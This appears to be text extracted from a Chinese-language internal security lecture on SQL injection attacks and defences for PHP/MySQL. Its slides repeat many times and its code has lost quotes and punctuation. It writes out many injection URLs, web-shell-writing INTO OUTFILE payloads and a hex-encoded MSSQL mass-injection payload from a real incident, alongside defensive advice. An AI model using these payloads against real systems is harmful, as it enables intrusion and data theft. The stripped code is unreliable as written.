Taien內部資安講座 IV 伺服器端攻擊與防禦I

20130307 Hiiir Inc

Taien Wanglttaien_wanghiiircomgt

英屬維京群島商時間軸科技股份有限公司新創事業部

1020307 伺服器端攻擊與防禦I - 大綱

bull SQL Injection

ndash 攻擊技巧

bull 判斷是否有弱點

bull 常用函數

bull UNION

bull 繞過跳脫字元

ndash ASCII編碼

ndash 16進位

ndash 雙位元組跳脫技巧

ndash SQL Blind Injection

bull Time-Based Blind SQL Injection

ndash SQL Column Truncation

SQL Injection ndash 簡介

bull Rfp ldquoNT Web Technology Vulnerabilitiesrdquo Phrack 1998

bull 維京百科

ndash SQL攻擊（SQL injection中國大陸稱作SQL注入攻擊）簡稱隱碼

攻擊是發生於應用程式之資料庫層的安全漏洞簡而言之是在輸入

的字串之中夾帶SQL指令在設計不良的程式當中忽略了檢查那麼這

些夾帶進去的指令就會被資料庫伺服器誤認為是正常的SQL指令而執行

因此遭到破壞

SQL Injection - 範例資料庫的資料

SQL Injection - 請試想這段程式碼有什麼問題

SQL Injection攻擊技巧 ndash 簡易嘗試是否有弱點

bull httpwwwhackdemocomgetUserphpid=1

bull httpwwwhackdemocomgetUserphpid=

bull httpwwwhackdemocomgetUserphpid=9999999

bull httpwwwhackdemocomgetUserphpid=1

bull httpwwwhackdemocomgetUserphpid=1+and+1=1

bull httpwwwhackdemocomgetUserphpid=1+and+1=2

1020307 伺服器端攻擊與防禦I - 大綱

bull SQL Injection

ndash 攻擊技巧

bull 判斷是否有弱點

bull 常用函數

bull UNION

bull 繞過跳脫字元

ndash ASCII編碼

ndash 16進位

ndash 雙位元組跳脫技巧

ndash SQL Blind Injection

bull Time-Based Blind SQL Injection

ndash SQL Column Truncation

SQL Injection ndash 簡介

bull Rfp ldquoNT Web Technology Vulnerabilitiesrdquo Phrack 1998

bull 維京百科

ndash SQL攻擊（SQL injection中國大陸稱作SQL注入攻擊）簡稱隱碼

攻擊是發生於應用程式之資料庫層的安全漏洞簡而言之是在輸入

的字串之中夾帶SQL指令在設計不良的程式當中忽略了檢查那麼這

些夾帶進去的指令就會被資料庫伺服器誤認為是正常的SQL指令而執行

因此遭到破壞

SQL Injection - 範例資料庫的資料

SQL Injection - 請試想這段程式碼有什麼問題

SQL Injection攻擊技巧 ndash 簡易嘗試是否有弱點

bull httpwwwhackdemocomgetUserphpid=1

bull httpwwwhackdemocomgetUserphpid=

bull httpwwwhackdemocomgetUserphpid=9999999

bull httpwwwhackdemocomgetUserphpid=1

bull httpwwwhackdemocomgetUserphpid=1+and+1=1

bull httpwwwhackdemocomgetUserphpid=1+and+1=2

SQL Injection ndash 簡介

bull Rfp ldquoNT Web Technology Vulnerabilitiesrdquo Phrack 1998

bull 維京百科

ndash SQL攻擊（SQL injection中國大陸稱作SQL注入攻擊）簡稱隱碼

攻擊是發生於應用程式之資料庫層的安全漏洞簡而言之是在輸入

的字串之中夾帶SQL指令在設計不良的程式當中忽略了檢查那麼這

些夾帶進去的指令就會被資料庫伺服器誤認為是正常的SQL指令而執行

因此遭到破壞

SQL Injection - 範例資料庫的資料

SQL Injection - 請試想這段程式碼有什麼問題

SQL Injection攻擊技巧 ndash 簡易嘗試是否有弱點

bull httpwwwhackdemocomgetUserphpid=1

bull httpwwwhackdemocomgetUserphpid=

bull httpwwwhackdemocomgetUserphpid=9999999

bull httpwwwhackdemocomgetUserphpid=1

bull httpwwwhackdemocomgetUserphpid=1+and+1=1

bull httpwwwhackdemocomgetUserphpid=1+and+1=2

SQL Injection - 範例資料庫的資料

SQL Injection - 請試想這段程式碼有什麼問題

SQL Injection攻擊技巧 ndash 簡易嘗試是否有弱點

bull httpwwwhackdemocomgetUserphpid=1

bull httpwwwhackdemocomgetUserphpid=

bull httpwwwhackdemocomgetUserphpid=9999999

bull httpwwwhackdemocomgetUserphpid=1

bull httpwwwhackdemocomgetUserphpid=1+and+1=1

bull httpwwwhackdemocomgetUserphpid=1+and+1=2

SQL Injection - 請試想這段程式碼有什麼問題

SQL Injection攻擊技巧 ndash 簡易嘗試是否有弱點

bull httpwwwhackdemocomgetUserphpid=1

bull httpwwwhackdemocomgetUserphpid=

bull httpwwwhackdemocomgetUserphpid=9999999

bull httpwwwhackdemocomgetUserphpid=1

bull httpwwwhackdemocomgetUserphpid=1+and+1=1

bull httpwwwhackdemocomgetUserphpid=1+and+1=2

SQL Injection攻擊技巧 ndash 簡易嘗試是否有弱點

bull httpwwwhackdemocomgetUserphpid=1

bull httpwwwhackdemocomgetUserphpid=

bull httpwwwhackdemocomgetUserphpid=9999999

bull httpwwwhackdemocomgetUserphpid=1

bull httpwwwhackdemocomgetUserphpid=1+and+1=1

bull httpwwwhackdemocomgetUserphpid=1+and+1=2

SQL Injection攻擊技巧 ndash 空格與註解

bull 關鍵字大小寫混雜

bull 註解

(23) --

bull 空格

+

URL編碼 用途

09 horizontal tab

0a line feed

0b vertical tab

0c form feed

0d carriage return

20 space

SQL Injection攻擊技巧 - 猜解資料常用函數

函數 功能

LENGTH(str) 返回字串長度

LEFT(strlen) 返回某字串開頭開始的len最左字串

RIGHT(strlen) 返回某字串開頭開始的len最右字串

SUBSTRING(strposlen) 取得某字串的子字串

SUBSTR(strposlen) 為SUBSTRING同義詞

MID(strposlen) 為SUBSTRING同義詞

CHAR(N [USING charset]) 其返回值為一個包含這些整數代碼值的字串

HEX(N_or_S) 如果N或S是一個數字則返回16進位N的字串

ASCII(str) 返回值為字串str的最左邊數值

CONCAT(str1str2) 返回值為所有連接參數產生的字串

NAME_CONST(namevalue) 返回一個定值當月來產生一個結果集合列時NAME_CONST()促使該列使用定義名稱 51後限制僅能使用CONST的變數

hellip

SQL Injection攻擊技巧 - 相關系統函數

函數 功能

LOAD_FILE(file_name) 讀取檔案

INTO OUTFILE varwwwhtmlbackphp 輸出檔案

VERSION() 返回MySQL伺服器版本

DATABASE() 目前使用資料庫名稱

USER() 返回目前MySQL用戶與主機名稱

SYSTEM_USER() 與USER()同義

SESSION_USER() 與USER()同義

SCHEMA() 與DATABASE()同義

CURRENT_USER() 返回當前被驗證的用戶名與主機名組合可能與USER()值有所不同

DATADIR 讀取資料庫路徑

BASEDIR 資料庫安裝路徑

hellip

SQL Injection攻擊技巧 ndash 讀檔注意事項

bull 欲讀取文件必須在伺服器上

bull 必須指定文件完整的路徑

bull 必須有權限讀取並且文件必須完全可讀

bull 欲讀取文件必須小於 max_allowed_packet

SQL Injection攻擊技巧 ndash UNION

bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION

ndash 有弱點的SQL語法沒有引號的參數(以PHP為例)

bull SELECT FROM `member` WHERE `id` =$id

ndash 沒有引號攻擊範例

bull httpwwwhackdemocomgetUserphpid=1+and+1=2+UNI

ON+SELECT+1234

ndash 實際執行語法

bull SELECT FROM `member` WHERE `id` =1 AND 1=2

UNION SELECT 1234

SQL Injection攻擊技巧 ndash UNION

bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION

bull 有弱點的SQL語法有引號的參數(以PHP為例)

bull SELECT FROM `member` WHERE `name` like $name

bull 沒有引號攻擊範例

bull httpwwwhackdemocomsearchUserphpname=ha

nd1=2unionselect123user()23

bull 實際執行語法

bull SELECT FROM `member` WHERE `name` like

hand1=2unionselect123user()

SQL Injection攻擊技巧 - 猜解資料常用函數

函數 功能

LENGTH(str) 返回字串長度

LEFT(strlen) 返回某字串開頭開始的len最左字串

RIGHT(strlen) 返回某字串開頭開始的len最右字串

SUBSTRING(strposlen) 取得某字串的子字串

SUBSTR(strposlen) 為SUBSTRING同義詞

MID(strposlen) 為SUBSTRING同義詞

CHAR(N [USING charset]) 其返回值為一個包含這些整數代碼值的字串

HEX(N_or_S) 如果N或S是一個數字則返回16進位N的字串

ASCII(str) 返回值為字串str的最左邊數值

CONCAT(str1str2) 返回值為所有連接參數產生的字串

NAME_CONST(namevalue) 返回一個定值當月來產生一個結果集合列時NAME_CONST()促使該列使用定義名稱 51後限制僅能使用CONST的變數

hellip

SQL Injection攻擊技巧 - 相關系統函數

函數 功能

LOAD_FILE(file_name) 讀取檔案

INTO OUTFILE varwwwhtmlbackphp 輸出檔案

VERSION() 返回MySQL伺服器版本

DATABASE() 目前使用資料庫名稱

USER() 返回目前MySQL用戶與主機名稱

SYSTEM_USER() 與USER()同義

SESSION_USER() 與USER()同義

SCHEMA() 與DATABASE()同義

CURRENT_USER() 返回當前被驗證的用戶名與主機名組合可能與USER()值有所不同

DATADIR 讀取資料庫路徑

BASEDIR 資料庫安裝路徑

hellip

SQL Injection攻擊技巧 ndash 讀檔注意事項

bull 欲讀取文件必須在伺服器上

bull 必須指定文件完整的路徑

bull 必須有權限讀取並且文件必須完全可讀

bull 欲讀取文件必須小於 max_allowed_packet

SQL Injection攻擊技巧 ndash UNION

bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION

ndash 有弱點的SQL語法沒有引號的參數(以PHP為例)

bull SELECT FROM `member` WHERE `id` =$id

ndash 沒有引號攻擊範例

bull httpwwwhackdemocomgetUserphpid=1+and+1=2+UNI

ON+SELECT+1234

ndash 實際執行語法

bull SELECT FROM `member` WHERE `id` =1 AND 1=2

UNION SELECT 1234

SQL Injection攻擊技巧 ndash UNION

bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION

bull 有弱點的SQL語法有引號的參數(以PHP為例)

bull SELECT FROM `member` WHERE `name` like $name

bull 沒有引號攻擊範例

bull httpwwwhackdemocomsearchUserphpname=ha

nd1=2unionselect123user()23

bull 實際執行語法

bull SELECT FROM `member` WHERE `name` like

hand1=2unionselect123user()

SQL Injection攻擊技巧 - 相關系統函數

函數 功能

LOAD_FILE(file_name) 讀取檔案

INTO OUTFILE varwwwhtmlbackphp 輸出檔案

VERSION() 返回MySQL伺服器版本

DATABASE() 目前使用資料庫名稱

USER() 返回目前MySQL用戶與主機名稱

SYSTEM_USER() 與USER()同義

SESSION_USER() 與USER()同義

SCHEMA() 與DATABASE()同義

CURRENT_USER() 返回當前被驗證的用戶名與主機名組合可能與USER()值有所不同

DATADIR 讀取資料庫路徑

BASEDIR 資料庫安裝路徑

hellip

SQL Injection攻擊技巧 ndash 讀檔注意事項

bull 欲讀取文件必須在伺服器上

bull 必須指定文件完整的路徑

bull 必須有權限讀取並且文件必須完全可讀

bull 欲讀取文件必須小於 max_allowed_packet

SQL Injection攻擊技巧 ndash UNION

bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION

ndash 有弱點的SQL語法沒有引號的參數(以PHP為例)

bull SELECT FROM `member` WHERE `id` =$id

ndash 沒有引號攻擊範例

bull httpwwwhackdemocomgetUserphpid=1+and+1=2+UNI

ON+SELECT+1234

ndash 實際執行語法

bull SELECT FROM `member` WHERE `id` =1 AND 1=2

UNION SELECT 1234

SQL Injection攻擊技巧 ndash UNION

bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION

bull 有弱點的SQL語法有引號的參數(以PHP為例)

bull SELECT FROM `member` WHERE `name` like $name

bull 沒有引號攻擊範例

bull httpwwwhackdemocomsearchUserphpname=ha

nd1=2unionselect123user()23

bull 實際執行語法

bull SELECT FROM `member` WHERE `name` like

hand1=2unionselect123user()

SQL Injection攻擊技巧 ndash 讀檔注意事項

bull 欲讀取文件必須在伺服器上

bull 必須指定文件完整的路徑

bull 必須有權限讀取並且文件必須完全可讀

bull 欲讀取文件必須小於 max_allowed_packet

SQL Injection攻擊技巧 ndash UNION

bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION

ndash 有弱點的SQL語法沒有引號的參數(以PHP為例)

bull SELECT FROM `member` WHERE `id` =$id

ndash 沒有引號攻擊範例

bull httpwwwhackdemocomgetUserphpid=1+and+1=2+UNI

ON+SELECT+1234

ndash 實際執行語法

bull SELECT FROM `member` WHERE `id` =1 AND 1=2

UNION SELECT 1234

SQL Injection攻擊技巧 ndash UNION

bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION

bull 有弱點的SQL語法有引號的參數(以PHP為例)

bull SELECT FROM `member` WHERE `name` like $name

bull 沒有引號攻擊範例

bull httpwwwhackdemocomsearchUserphpname=ha

nd1=2unionselect123user()23

bull 實際執行語法

bull SELECT FROM `member` WHERE `name` like

hand1=2unionselect123user()

SQL Injection攻擊技巧 ndash UNION

bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION

ndash 有弱點的SQL語法沒有引號的參數(以PHP為例)

bull SELECT FROM `member` WHERE `id` =$id

ndash 沒有引號攻擊範例

bull httpwwwhackdemocomgetUserphpid=1+and+1=2+UNI

ON+SELECT+1234

ndash 實際執行語法

bull SELECT FROM `member` WHERE `id` =1 AND 1=2

UNION SELECT 1234

SQL Injection攻擊技巧 ndash UNION

bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION

bull 有弱點的SQL語法有引號的參數(以PHP為例)

bull SELECT FROM `member` WHERE `name` like $name

bull 沒有引號攻擊範例

bull httpwwwhackdemocomsearchUserphpname=ha

nd1=2unionselect123user()23

bull 實際執行語法

bull SELECT FROM `member` WHERE `name` like

hand1=2unionselect123user()

SQL Injection攻擊技巧 ndash UNION

bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION

bull 有弱點的SQL語法有引號的參數(以PHP為例)

bull SELECT FROM `member` WHERE `name` like $name

bull 沒有引號攻擊範例

bull httpwwwhackdemocomsearchUserphpname=ha

nd1=2unionselect123user()23

bull 實際執行語法

bull SELECT FROM `member` WHERE `name` like

hand1=2unionselect123user()

SQL Injection攻擊技巧 - 成功控制語法

SQL Injection攻擊技巧 ndash 猜解資料

bull 取得長度

ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA

SSWORD)=1

ndash hellip

ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA

SSWORD)=7

bull 猜解資料

ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS

SWORD1)=a

ndash hellip

ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS

SWORD1)=w

SQL Injection攻擊技巧 ndash 猜解資料

bull 取得長度

ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA

SSWORD)=1

ndash hellip

ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA

SSWORD)=7

bull 猜解資料

ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS

SWORD1)=a

ndash hellip

ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS

SWORD1)=w

SQL Injection攻擊技巧 ndash 讀寫檔案

bull 讀資料寫檔案

ndash httpwwwhackdemocomgetUserphpid=1+into+outfile+DW

ebsitewwwhackdemocommembertxt

bull 寫後門

ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO

N+SELECT+223Cphp+system($_GET[cmd])3E22234+i

nto+outfile+DWebsitewwwhackdemocomcmdphp

加上跳脫與關閉錯誤訊息這樣安全了嗎

SQL Blind Injection

bull SQL盲注入(SQL Blind Injection)也是一種SQL Injection的類型一般

SQL Injection仰賴出錯的相關訊息建構攻擊語法而盲注入完全仰賴語法

執行的對(true)錯(false)

bull SQL Blind Injection

ndash 一般盲注入

ndash Time-Based Blind SQL Injection

Time-Based Blind SQL Injection (12)

bull 透過時間的延遲來判斷該SQL語法是否執行成功

bull 技巧

ndash 內建函數

bull BENCHMARK(COUNT EXPR)

bull SLEEP(seconds)

ndash MySQL gt= 5

ndash 創建較花時間的語法(heavy queries)

Time-Based Blind SQL Injection - 使用heavy queries (22)

Time-Based Blind SQL Injection - 透過時間延遲猜解資料庫名稱

bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL

ECT+IF(SUBSTRING(db11)=CHAR(1)BENCHMARK(5000000E

NCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABAS

E()+as+db)+AS+tb

bull hellip

bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL

ECT+IF(SUBSTRING(db11)=CHAR(104)BENCHMARK(5000000

ENCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABA

SE()+as+db)+AS+tb

SQL Blind Injection

bull SQL盲注入(SQL Blind Injection)也是一種SQL Injection的類型一般

SQL Injection仰賴出錯的相關訊息建構攻擊語法而盲注入完全仰賴語法

執行的對(true)錯(false)

bull SQL Blind Injection

ndash 一般盲注入

ndash Time-Based Blind SQL Injection

Time-Based Blind SQL Injection (12)

bull 透過時間的延遲來判斷該SQL語法是否執行成功

bull 技巧

ndash 內建函數

bull BENCHMARK(COUNT EXPR)

bull SLEEP(seconds)

ndash MySQL gt= 5

ndash 創建較花時間的語法(heavy queries)

Time-Based Blind SQL Injection - 使用heavy queries (22)

Time-Based Blind SQL Injection - 透過時間延遲猜解資料庫名稱

bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL

ECT+IF(SUBSTRING(db11)=CHAR(1)BENCHMARK(5000000E

NCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABAS

E()+as+db)+AS+tb

bull hellip

bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL

ECT+IF(SUBSTRING(db11)=CHAR(104)BENCHMARK(5000000

ENCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABA

SE()+as+db)+AS+tb

Time-Based Blind SQL Injection (12)

bull 透過時間的延遲來判斷該SQL語法是否執行成功

bull 技巧

ndash 內建函數

bull BENCHMARK(COUNT EXPR)

bull SLEEP(seconds)

ndash MySQL gt= 5

ndash 創建較花時間的語法(heavy queries)

Time-Based Blind SQL Injection - 使用heavy queries (22)

Time-Based Blind SQL Injection - 透過時間延遲猜解資料庫名稱

bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL

ECT+IF(SUBSTRING(db11)=CHAR(1)BENCHMARK(5000000E

NCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABAS

E()+as+db)+AS+tb

bull hellip

bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL

ECT+IF(SUBSTRING(db11)=CHAR(104)BENCHMARK(5000000

ENCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABA

SE()+as+db)+AS+tb

Time-Based Blind SQL Injection - 使用heavy queries (22)

Time-Based Blind SQL Injection - 透過時間延遲猜解資料庫名稱

bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL

ECT+IF(SUBSTRING(db11)=CHAR(1)BENCHMARK(5000000E

NCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABAS

E()+as+db)+AS+tb

bull hellip

bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL

ECT+IF(SUBSTRING(db11)=CHAR(104)BENCHMARK(5000000

ENCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABA

SE()+as+db)+AS+tb

Time-Based Blind SQL Injection - 透過時間延遲猜解資料庫名稱

bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL

ECT+IF(SUBSTRING(db11)=CHAR(1)BENCHMARK(5000000E

NCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABAS

E()+as+db)+AS+tb

bull hellip

bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL

ECT+IF(SUBSTRING(db11)=CHAR(104)BENCHMARK(5000000

ENCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABA

SE()+as+db)+AS+tb

SQL Injection攻擊技巧 - 繞過跳脫字元

bull ACSII編碼

ndash ASCII() CHAR()

ndash 單一

bull CHAR(68)

ndash 多個

bull CHAR(68 58 92)

bull 16進位編碼

ndash HEX()

ndash 0x443A5C

bull 雙位元組跳脫技巧

SQL Injection攻擊技巧 - 猜解資料(繞過跳脫)

bull 猜解欄位

ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO

N+SELECT+1234+FROM+user--

ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO

N+SELECT+1234+FROM+member--

bull 猜解欄位資料

ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT

(PASSWORD1)=char(0)

ndash hellip

ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT

(PASSWORD1)=char(119)

SQL Injection攻擊技巧 - 猜解資料(繞過跳脫)

bull 猜解欄位

ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO

N+SELECT+1234+FROM+user--

ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO

N+SELECT+1234+FROM+member--

bull 猜解欄位資料

ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT

(PASSWORD1)=char(0)

ndash hellip

ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT

(PASSWORD1)=char(119)

SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)

bull 讀資料寫檔案

ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=

2+UNION+SELECT+123load_file(char(6858928710198

11510511610192119119119461049799107100101

1091114699111109921031011168511510111446

112104112))--

ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=

2+UNION+SELECT+123load_file(0x443A5C576562736974

655C7777772E6861636B64656D6F2E636F6D5C636F6E6669

672E706870)--

SQL Injection攻擊技巧 ndash 寫檔案(無法繞過引號限制)

1 找到phpMyAdmin

2 遠端MySQL

mysqlgt use xssdb

mysqlgt set

a=0x73656C656374203078334333463730363837303230343036353736363136433238323

435463530344635333534354232373633364436343237354432393342334633452066726F6D

20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70

687027

mysqlgt prepare cmd from a

mysqlgt execute cmd

a為

select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from

xss limit 1 into outfile Cshellphp

寫入檔案為

ltphp eval($_POST[cmd])gt

SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)

bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制

bull 情境

ndash 跳脫字元處理

bull addslashes

bull mysql_escape_string

bull phpin

ndash magic_quotes_gpc 開啟

ndash 採用BIG5或GBK編碼

bull set names gbk set names big5

SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)

bull 中文語系文字以兩個位元組表示

ndash Big5

bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE

ndash GBK

bull 前位元組 0x81-0xFE後位元組 0x40-0x7E

ndash GB2312

bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE

ndash 攻擊字元 BF CC D5hellip

SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)

bull 有引號的參數繞過跳脫

ndash httpwwwhackdemocomsearchUserLashphpname=h

B5+AND+1=2+UNION+SELECT+123423

ndash httpwwwhackdemocomsearchUserLashphpname=h

CC+AND+1=2+UNION+SELECT+123423

ndash httpwwwhackdemocomsearchUserLashphpname=h

d5+AND+1=2+UNION+SELECT+123423

SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)

bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制

bull 情境

ndash 跳脫字元處理

bull addslashes

bull mysql_escape_string

bull phpin

ndash magic_quotes_gpc 開啟

ndash 採用BIG5或GBK編碼

bull set names gbk set names big5

SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)

bull 中文語系文字以兩個位元組表示

ndash Big5

bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE

ndash GBK

bull 前位元組 0x81-0xFE後位元組 0x40-0x7E

ndash GB2312

bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE

ndash 攻擊字元 BF CC D5hellip

SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)

bull 有引號的參數繞過跳脫

ndash httpwwwhackdemocomsearchUserLashphpname=h

B5+AND+1=2+UNION+SELECT+123423

ndash httpwwwhackdemocomsearchUserLashphpname=h

CC+AND+1=2+UNION+SELECT+123423

ndash httpwwwhackdemocomsearchUserLashphpname=h

d5+AND+1=2+UNION+SELECT+123423

SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)

bull 中文語系文字以兩個位元組表示

ndash Big5

bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE

ndash GBK

bull 前位元組 0x81-0xFE後位元組 0x40-0x7E

ndash GB2312

bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE

ndash 攻擊字元 BF CC D5hellip

SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)

bull 有引號的參數繞過跳脫

ndash httpwwwhackdemocomsearchUserLashphpname=h

B5+AND+1=2+UNION+SELECT+123423

ndash httpwwwhackdemocomsearchUserLashphpname=h

CC+AND+1=2+UNION+SELECT+123423

ndash httpwwwhackdemocomsearchUserLashphpname=h

d5+AND+1=2+UNION+SELECT+123423

SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)

bull 有引號的參數繞過跳脫

ndash httpwwwhackdemocomsearchUserLashphpname=h

B5+AND+1=2+UNION+SELECT+123423

ndash httpwwwhackdemocomsearchUserLashphpname=h

CC+AND+1=2+UNION+SELECT+123423

ndash httpwwwhackdemocomsearchUserLashphpname=h

d5+AND+1=2+UNION+SELECT+123423

SQL Column Truncation ndash 簡介(13)

bull MySQL中 SQL mode

ndash 沒有開啟 STRICT_ALL_TABLES

bull 使用者新增超過長度的資料會出現警告提示

bull 但資料還是會新增

ndash 開啟 STRICT_ALL_TABLES

bull 使用者新增超過長度的資料會出現提示

bull 出現ERROR 1406 該資料不會成功新增

bull 慘案

ndash 2008-09-07

bull WordPress 261 SQL Column Truncation Vulnerability

SQL Column Truncation - 效果(23)

SQL Column Truncation - 防禦方案(33)

bull 在字串中不該有空白的主動清除

ndash 如帳號類資訊

bull 在 SELECT 資料時加上 BINARY 參數

bull 在 MySQL 設定預設以 BINARY 查詢

bull 在 MySQL 開啟 STRICT_ALL_TABLES

ndash 超過欄位長度會出現 ERROR 而非出現 WARNING

ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查

SQL Injection ndash 延伸思考

bull INSERT 與 UPDATE 的攻擊可能發生嗎

bull NoSQL 沒有 SQL Injection

bull 其他攻擊利用

ndash Deep Blind Injection

ndash Error-Based Injection

bull Duplicate Error

bull Function

ndash information_schema

ndash 使用者自訂函數(User-Defined Functions)

ndash 觸發(Trigger)

SQL Injection ndash 自動化工具

bull Havij

bull Pangolin

bull w3af

bull Jsky

bull SQLmap

bull hellip

SQL Column Truncation - 防禦方案(33)

bull 在字串中不該有空白的主動清除

ndash 如帳號類資訊

bull 在 SELECT 資料時加上 BINARY 參數

bull 在 MySQL 設定預設以 BINARY 查詢

bull 在 MySQL 開啟 STRICT_ALL_TABLES

ndash 超過欄位長度會出現 ERROR 而非出現 WARNING

ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查

SQL Injection ndash 延伸思考

bull INSERT 與 UPDATE 的攻擊可能發生嗎

bull NoSQL 沒有 SQL Injection

bull 其他攻擊利用

ndash Deep Blind Injection

ndash Error-Based Injection

bull Duplicate Error

bull Function

ndash information_schema

ndash 使用者自訂函數(User-Defined Functions)

ndash 觸發(Trigger)

SQL Injection ndash 自動化工具

bull Havij

bull Pangolin

bull w3af

bull Jsky

bull SQLmap

bull hellip

SQL Injection ndash 延伸思考

bull INSERT 與 UPDATE 的攻擊可能發生嗎

bull NoSQL 沒有 SQL Injection

bull 其他攻擊利用

ndash Deep Blind Injection

ndash Error-Based Injection

bull Duplicate Error

bull Function

ndash information_schema

ndash 使用者自訂函數(User-Defined Functions)

ndash 觸發(Trigger)

SQL Injection ndash 自動化工具

bull Havij

bull Pangolin

bull w3af

bull Jsky

bull SQLmap

bull hellip

SQL Injection ndash 自動化工具

bull Havij

bull Pangolin

bull w3af

bull Jsky

bull SQLmap

bull hellip

正確地防禦SQL Injection

bull 最低權限原則

bull 使用預先編譯敘述

bull 使用預存函數

bull 使用UTF8避免使用BIG5或GBK

bull 檢查資料型態與強制轉型

ndash bool settype(mixed amp$var string $type)

ndash intval doubleval

bull 使用安全函數

ndash OWASP ESAPI

bull MySQLCodec

MSSQL實際案例 - 116juristru自動化注入(14)

bull 201212xx 100331

bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66

66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204

445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142

4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4

12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865

726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74

657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448

3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162

6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434

8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040

46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275

d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249

4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b

40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652

4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43

7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--

MSSQL實際案例 - 116juristru自動化注入(24)

bull 201212xx 100333

bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66

66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204

445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142

4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4

12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865

726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74

